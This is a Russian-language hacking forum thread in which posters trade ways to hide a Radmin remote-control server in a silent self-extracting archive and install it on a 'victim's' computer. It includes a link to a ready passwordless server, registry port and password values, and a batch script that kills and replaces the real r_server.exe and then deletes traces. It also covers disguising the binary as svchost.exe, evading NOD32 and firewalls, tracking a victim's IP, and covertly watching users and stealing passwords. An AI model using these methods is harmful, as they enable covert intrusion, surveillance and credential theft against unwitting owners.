Да я сам незнаю.....если чесно.....;( кто может привести пример Sfx архива??? с уже готовым радмином для впаривания...
Параметры SFX-архива: Состав архива: Содержимое run.cmd: P.S. Забирайте готовый сервер Радмина (стандартный порт, без пароля версия 2.2): http://lebed.ucoz.ru/soft/RA.zip
такс....теперь помогите еще разок.. у меня есть все сделанное по FAQ в самом начале...т.е. AdmDll.dll 111.reg r_server.exe raddrv.dll 111.bat DEL.bat => мне надо еще создать фаил run.cmd с содержимым и все?
Да, не, мона bat, можно cmd (cmd - тока на XP, батник на любой винде будет работать), содержимое, то что я написал, можешь делать как Elekt написал, я же выложил готовый - распакуй его winrar`ом в любую папку и посмотри...
а...т.е......мона скачать архив #4 и просто его в sfx и прописать коментарий ??? и при его запуске типа "не чё не произойдет" но сервак радмина будет установлен..?
"Parameter"=hex:38,70,e3,b9,f6,f4,fb,9e,f8,9c,77,92,11,f4,ce, 1a "Port"=hex:23,13,00,00 Но все таки что мне надо изменить в этих строчках чтоб пароль и порт поменять ? Или скажите где есть инфа по реестру ну про его кодирование !
Тема супер! -И антивирусом (в часности NOD32 ) не палится, как было сказано в посте ... -Доработал под себя, получился не плохой наборчик, всего из 4-х файлоф ... svchost.exe (убрана иконка, которая настораживала своим видом когда в списке висят штук 8 svchost -ов и один из них ЧЁРНЫЙ ... ) set_time.bat (ранее знакомый нам как 111.bat но включающий в себя и команды reg add и заметания следов del всех перечисленных фалов, после их проработки raddrv.dll (убрана подпись о том что она пренадлежит Remote Administrator) AdmDll.dll -Следующим этапом, буду клееть с Anti-Vypress-Chat -Который пользуется большой популярностью в наших локалках ... -Есть одна только проблема: Виндовозовский брадмауер, чётко обошли ... А как быть с OutPost-ом Пробовал создавать правило "исключение" для данного процесса (в OutPost) -ну типа -"разрешить данному приложению всё" ... Затем сравнивал снимки реестра (TotallUninstall-ером), сделаные до, и после разрешения, (были изменения в некоторых его ветвях...) Но после "икуственного" импортирования этих пааметров, посредством bat-ника ну или файла.reg -OutPost не принимает его в исключения (разрешённые программы) -Может есть у кого, какие соображения на данную тему?
Народ, подскажите. Есть файл, склееный клеем SuperGlue, но он распознается как вирус. Чем его можно закриптовать, чтобы он не палился? )
Кто может выложить файлы от радмина raddrv.dll, AdmDll.dll не поляшийся nod32 ато они уменя уже палиться .
Не вижу обходимости выкладывать ... поскольку, установив Radmin, ты найдёшь в его папке, всё что ты ищешь ;-) - Чтож за NOD у тебя такой? У меня NOD32 c версией баз 2144 от 25 марта и них... не палит ....
У меня каждый день обновления на нод ,но тоже не палит ! Он палит только когда глубокий анализ делаешь , а так даже при запуске палит ? ха Спс за эту инструкцию автору ! Наугарался я и пароли крал ,но че-то быстро надоедает так угарать !
Проблема.... У жертвы динамический ip, как сделать так, чтобы при выходе её в онлайн мне отсылался её новый адрес
установить у жертвы соответствующий софт. но в паблике я не припомню такого, в принципе такая прожка недолго пишется. метод для ленивых: сканить пул жертвы на открытый радмин порт =)
Помогите доработать способ подмены настоящего файла радмины на поддельный, чтоб не пропалили. Вобщем забацал я сервак радмина так что он при любом подключении синего цвета и даже если на него нажать он все равно пишет Нет соединений. Теперь надо подменить реальный на мой. Я делал так: taskkill /im r_server.exe /f del C:\WINDOWS\system32\r_server.exe . . {эту строку я продублировал 100 раз} . . del C:\WINDOWS\system32\r_server.exe copy /y "r_server.exe" "%SYSTEMROOT%\system32\r_server.exe" "%SYSTEMROOT%\system32\r_server.exe" /start del C:\r_server.exe del C:\start.bat Затем сохраняю его с именем start.bat, пакую батник и мой файл сервака винраром в sfx. При упаковке настраиваю чтоб распаковывался на диск С. Ставлю галочку Скрывать все и перезаписывать существующие фалы. Остается только приконектится к жертве через телнет и перепись файлов (ПРИ ЭТИХ ПОДКЛЮЧЕНИЯХ ЦВЕТ ИКОНКИ РАДИНА НЕ МЕНЯЕТСЯ). Закидываю файл, запускаю и отсоединяюсь. Через секунд 15 обратно присоединяюсь через Перепись файлов и снова копирую файл r_server.exe чтобы проверить подменился он или нет. Если это мой то все олично. Отключаю звук при подключении и можно смело наблюдать за действиями пользователя. Всегда когда я так делал все работало, НО на одном компе это не проходит. Не могу понять почему. Может кто подскажет как усовершенствовать этот метод?
